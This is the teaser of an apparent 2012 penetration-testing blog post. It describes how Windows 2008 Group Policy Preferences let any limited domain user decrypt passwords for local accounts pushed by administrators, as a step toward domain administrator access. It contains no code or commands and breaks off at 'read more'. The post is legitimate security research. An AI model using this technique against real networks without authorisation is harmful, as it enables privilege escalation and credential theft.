Exploiting Windows 2008 Group Policy Preferences

Fri 20 January 2012 by trance

Internal network pentesting involving domain controllers requires a few steps in order to gain domain administrator access. One of them usually requires to gain local administrator access to a workstation. In this article, we show how this can be possible from a limited domain user account when specific Group Policy Preferences (GPP) are deployed. GPP are new Active Directory features introduced in Windows 2008; documenting all of them is not the purpose of this article. We focus on the one called Local Users and Groups, that enables a domain administrator to remotely create local accounts on a given list of machines. After explaining how those settings, and especially passwords, are downloaded on domain workstations, we highlight an existing but poorly known vulnerability documented feature enabling any limited domain user to instantly decrypt them.

read more